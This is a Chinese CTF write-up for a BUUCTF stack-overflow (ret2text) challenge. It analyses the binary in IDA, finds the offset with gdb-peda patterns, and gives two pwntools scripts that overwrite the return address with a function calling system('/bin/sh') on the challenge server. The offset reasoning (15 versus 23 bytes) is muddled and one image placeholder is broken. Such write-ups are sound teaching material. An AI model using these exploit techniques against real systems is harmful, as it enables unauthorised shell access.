连接上题目环境后,发现可以输入字符,然后得到返回
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传
用IDA分析程序,发现主函数和一个名为fun的子函数
先看main函数的汇编代码和伪代码
get很明显没有限制输入,那么就存在溢出的漏洞,在字符串表中又发现了/bin/sh的字符,在fun函数中用了system函数进入到/bin/sh,那么就可以通过将fun函数的地址覆盖到返回地址就可以实现溢出获得系统权限
双击s查看输入点在栈的位置,发现只需存入15个字节即可劫持函数返回地址,因此 最后偏移量为 :15+8 = 23,8个字节是返回地址和fun函数的地址
这里也可以使用peda来计算偏移量
先用gdb加载文件进行调试
生成溢出字符,保证长度可以覆盖到栈即可
gdb-peda$ pattern create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
执行 r 或者 start 命令让程序运行。//注意 start 命令执行后,还需执行 contin 命令。
在 please input 命令后,将之前生成的溢出字符串粘贴上去。
注意到 RBP寄存器。也可以计算此时 nAACAA-A 的偏移量:
找到 stack 复制栈顶的字符串 // 前四个字节(64 bits为前8个字节) 计算偏移量
执行 pattern offset xxxxxx 命令。
pattern offset A(AADAA;
得到偏移量 23
这时要知道fun函数的入口地址
exp编写步骤:
from pwn import * #引入pwn库
p = remote(ip, port) # 输入对应的ip地址和端口号来连接其他主机的服务
# 输入payload来进行操作以拿到程序的shell payload一般等于 偏移量 + 地址
p.interactive() # 反弹shell
exp1:
from pwn import *
p = remote('node3.buuoj.cn',28109)
payload = b'a'*23+p64(0x401185)+p64(0x401186)
p.sendline(payload)
p.interactive()
exp2:
from pwn import *
p = remote('node3.buuoj.cn',28109)
payload = b'a'*15+p64(0x401186)
p.sendline(payload)
p.interactive()